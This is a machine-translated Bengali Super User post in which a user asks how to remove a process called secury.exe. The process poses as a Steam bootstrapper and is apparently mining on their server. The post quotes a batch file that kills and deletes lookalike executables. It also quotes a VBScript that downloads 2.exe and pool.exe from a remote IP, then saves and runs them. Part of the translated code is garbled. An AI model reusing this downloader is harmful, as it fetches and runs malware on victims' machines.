উইন্ডোজ - কিভাবে স্থায়ীভাবে বাষ্প ক্লায়েন্ট বুটস্ট্র্যাপারকে হত্যা করবেন - সুপার ব্যবহারকারী

আমি আমার টাস্ক ম্যানেজার নিম্নলিখিত পরিস্থিতি আছে:

আমি জানি না এটি কোন ধরণের অ্যাপ, তবে স্পষ্টভাবে স্টিম ক্লায়েন্ট বুটস্ট্র্যাপার নয় কারণ আমি এটি ইনস্টল করি নি এবং এটি আনইনস্টলও করতে পারছি না।

আমি যদি এই পদক্ষেপের মাধ্যমে কোন ধরণের অ্যাপ্লিকেশনটি বের করতে চেষ্টা করি তা সনাক্ত করতে চেষ্টা করি:

আমি এই মত কিছু দেখতে:

এমএস কনফিগারেশন ইউটিলিটিতে আমি secury.exe মত দেখাচ্ছে এমন কিছু খুঁজে পাইনি।

যখন আমি ফাইলের অবস্থান খুলি, তখন আমি তিনটি ফাইল দেখি:

এম। বিট, বি। এক্স, 4 ভিবিএস।

নীচে m.bat কন্টেন্ট যায়:

টাস্ক্কিল / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev টাস্ক্কিল / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe টাস্ক্কিল / f / t / im SystemSettlngs.exe টাস্ক্কিল / f / t / im SystemSetting.exe টাস্ক্কিল / f / t / im Process.exe taskkill / f / t / im winlnlt.exe টাস্ক্কিল / f / t / im উইন্ডোজUpgrade.exe টাস্ক্কিল / f / t / im msdc.exe টাস্ক্কিল / f / t / im Fiddlere.exe টাস্ক্কিল / f / t / im shovst.exe টাস্ক্কিল / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ windows \ system32 \ soiuos.exe del সি: \ উইন্ডোজ \ সেটআপ \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe Del C: \ Pro গ্র্যামডাটা \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe ডেল সি: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del সি: \ ProgramData \ pool3.exe

পরবর্তী 4.vbs যায়

XPost = CreateObject ("মাইক্রোসফ্ট.এক্সএমএলএইচটিটিপি") এক্সপস্ট সেট করুন। "GET" খুলুন, "http://223.68.209.7:65510/2.exe", 0 xPost.Send () সেট করুন sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 সেট করুন xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () সেট করুন sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell") চালান "C: \ ProgramData \ pool3.exe" CreateObject (RunObject) "WScript.Shell") চালান "ডেল সি: \ ProgramData \ pool3.exe"

আমার সার্ভারের কম্পিউটিং ক্ষমতা অপব্যবহার থেকে secury.exe থামাতে আমি কি করতে পারি?

পিএস আমি আমার কম্পিউটার Avast পূর্ণ চেক মৃত্যুদন্ড কার্যকর করেছি, কিন্তু এটা কিছু ভুল খুঁজে পাওয়া যায় নি।